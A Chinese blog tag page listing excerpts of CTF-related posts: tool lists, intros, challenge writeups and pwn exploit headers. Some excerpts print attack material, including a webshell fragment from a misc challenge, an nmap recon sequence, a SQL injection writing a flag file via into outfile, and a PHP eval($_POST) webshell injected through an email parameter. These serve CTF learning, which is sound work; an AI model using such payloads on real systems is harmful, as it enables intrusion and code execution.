首页 > TAG信息列表 > ctf

CTF比赛必备常用工具

文中介绍的所有工具,均在压缩包中,结合本文更便于大家下载使用,快速上手。 [CTF常用工具下载]一、什么是CTF在解题模式CTF赛制中,参赛队伍可以通过互联网或者现场网络参与,这种模式的CTF竞赛与ACM编程竞赛、信息学奥赛比较类似,以解决网络安全技术挑战题目的分值和时间来排名,通常用于在线

什么是CTF

本文是对入门学习的一些概念了解和一些常规场景记录 1.CTF(capture the flag)是夺旗赛的意思。 是网络安全技术人员之间进行攻防的比赛。 起源1996年DEFCON全球黑客大会,替代之前真实攻击的技术比拼。(DEFCON极客大会诞生1993,每年7月在拉斯维加斯举行) 有黑客比赛的世界杯的说法。 CT

CTF 未分类题目 WriteUp

Misc MASK zip相关考点,掩码攻击,明文攻击等 base32 => base64 => 保存为zip。 解压出hint提示 ZZLT123??? Advanced Archive Password Recovery 掩码攻击, 得到密码 ZZLT123&*% 解压文件 看到zip有desktop.png。手动将desktop.png压缩为zip存储。 明文攻击 pkcrack flag{zip_1s_s

一个远大的目标

1.   python基础   c语言    计算机网络基础    计算机组成原理   编译原理  算法和数据结构 2.   web漏洞精通     爬虫精通    ctf比赛   渗透测试成熟  3.你说培训机构的人,那他妈的也不行啊  ,牛逼的人早被安全公司拉拢了。

CTF_攻击目标主机获取root权限及flag全流程分析详解

一、主机发现   1、nmap -sP 192.168.178.1/24     //ping扫描C段    2、arp-scan -l                          //感觉快一点   3、netdiscover -p   二、端口扫描 1、nmap  -p 1-65535 -A 192.168.178.133         nmap -sV  靶场IP       

[HBNIS2018]低个头

[HBNIS2018]低个头 根据题目提示,低下头能看见键盘,把键盘上的这几个键连接起来 flag{CTF}

X-CTF(REVERSE高级) asong

asong加密程序、out加密结果、that_girl加密引用的数据 out:一堆乱码二进制 that_girl:66行英语文字 asong: 一、函数功能解析 main函数 获取用户输入的值,引用that_girl文件做词频统计,对用户的输入值和统计结果进行一通操作后将结果保存输出到out文件 sub_400AAA函数 打开that_girl

CTF刷题网站

攻防世界 CTF Hub Bugku CTF BMZ CTF CTFshow WP CTF工具下载   <p><a href="https://adworld.xctf.org.cn/home/index"><strong>攻防世界</strong></a></p> <p><a href="https://www.ctfhub.com/#/index"><stro

CTF-2022 蓝帽杯-Misc-domainhacker2

附件 链接:https://pan.baidu.com/s/1q-9HIdbsARa81dAGXgdpJQ?pwd=msjz 提取码:msjz 思路 与domainhacker一致 <?php $ret=@runcmd($r." 2>&1"); $r="{$p} {$c}"; $p=base64_decode(substr($_POST["i00fdbe370f732"],2)); $c=substr($d,0,1)==&qu

CTF-Buuoj-Pwn-[第五空间2019 决赛]PWN5

格式化字符串 #----------------------------------------------------------------------------------------------- # coding:UTF-8 | # author:zxcyyyyy000

CTF-Buuoj-Pwn-jarvisoj_level0

#----------------------------------------------------------------------------------------------- # coding:UTF-8 | # author:zxcyyyyy000

ctf pwn题patch方法(UAF)

ctf pwn题patch方法(UAF) 以ciscn2022华东南赛区一题为例,附件在文章末尾 漏洞在sub_1614函数,free之后指针没有置零 patch步骤如下: 修改.eh_frame section所在segment权限,使patch代码可以执行 View->Open subviews->Segments查看.eh_frame section的地址,可以看到是0x1e00-0x2208

CTF自学

   刷了刷CTF,记录一下模糊的和不会的知识点 robots协议:网络爬虫排除标准  它是搜索引擎中访问网站的时候要查看的第一个文件。robots.txt文件告诉蜘蛛程序在服务器上什么文件是可以被查看的。 当一个搜索蜘蛛访问一个站点时,它会首先检查该站点根目录下是否存在robots.txt 

《CTF权威指南(pwn)》学习笔记

第一章 知名安全会议 RSA、Black Hat、DEFCON、ISC(中国互联网安全大会) 学术顶会 CCS(A): ACM Conference on Computer and Communications Security NDSS(B): Network and Distributed System Security Symposium Oakland S&P(A): IEEE Symposium on Security & Pri

本科毕设CTF平台-MarsCTF

MarsCTF Vue+Springboot开发的CTF学习平台,提供动态靶机、学习模块、writeup模块等等CTF平台的核心功能。提供docker版本。 演示视频:https://www.bilibili.com/video/BV1eA4y1o73C Tips: 前后端分离项目,本仓库为后端,前端仓库在https://github.com/b1ackc4t/MarsCTF-client 快速启

CTF竞赛权威指南(PWN篇)下载地址

博客网址:www.shicoder.top 微信:18223081347 欢迎加群聊天 :452380935 这里给大家提供《CTF竞赛权威指南(PWN篇)》的下载地址(不是网上的64页),因为是百度云链接,想要的可以加我微信

学习情况

1.CTF篇 《CTF竞赛权威指南(pwn篇)》 《从0到1 CTFer成长之路》 《CTF特训营-FlappyPig战队》 星盟安全Pwn教程 CTF Pwn入门教程 2.Java篇 狂神说Java 零基础 3.PHP篇 黑马程序员PHP零基础入门 4.前端篇 黑马程序员前端入门 5.web安全 小迪安全 《白帽子讲web安全》 《代码审计:企业

2021.12掌控安全擂台赛 部分WriteUp

签到题:一张简单图片 在线网址查看源代码 https://tools.yum6.cn/Tools/view_source/index.php 或者将图片下载到本地,查看十六进制发现最后面有一串HTML代码 解密一下 仙剑奇侠传-翻牌游戏 查看源码看到有三个可跳转文件 在 css/style.css 和 js/main.js 里面各有一段 Jsfuck

CTF线下AWD攻防模式的准备工作

描述:举办方不允许自带电脑,所以此文章做一些简单工作 0X01 改SSH密码 官方在给出服务器密码时,很有可能是默认的,需要赶快修改自己的密码并尝试能不能登录别人的靶机 0X02 命令行简单查找后门 find / -name '*.php' | xargs grep -n 'eval' find / -name '*.php' | xargs grep -n 'sy

Bugku CTF MISC 部分WriteUp

签到题

虎符CTF 2022 babygame wp

先贴下exp,wp晚点来补 完整exp # Arch: amd64-64-little # RELRO: Full RELRO # Stack: Canary found # NX: NX enabled # PIE: PIE enabled from pwn import * from ctypes import * # from LibcSearcher import * import sys contex

2022 *CTF examination

exp from pwn import* context.log_level = 'debug' context.arch = 'amd64' #s = process('./examination') s = remote('124.70.130.92',60001) libc = ELF('/lib/x86_64-linux-gnu/libc.so.6') def init_role(role):

Angr_CTF 学习记录

项目地址:https://github.com/jakespringer/angr_ctf 00_angr_find 拖 ida,大致流程就是字符串加密后等于给定值,可以直接爆破。 Angr 的基本使用步骤: 1.创建 project 2.设置 state 3.新建符号量:BVS (bitvector symbolic ) 或 BVV (bitvector value) 4.把符号量设置到内存或者其他

ctf_show-web入门-其他-(406-422)

406 http://www.baidu.com;'union/**/select/**/1,(select/**/flag/**/from/**/flag)/**/into/**/outfile/**/"/var/www/html/flag.txt"%23       407 ?ip=cafe::add ip6地址,类的名字叫cafe都是16进制       408 ?email="<?php eval($_POST[1]);?>"

CTF_Pwn保护机制相关(动态更新)

保护机制及其编译选项 NX -z execstack / -z noexecstack (关闭 / 开启) 不让执行栈上的数据,于是JMP ESP就不能用了 即可写处不可执行,可执行处不可写 Canary -fno-stack-protector /-fstack-protector / -fstack-protector-all (关闭 / 开启 / 全开启) 栈里插入cookie信息 又名金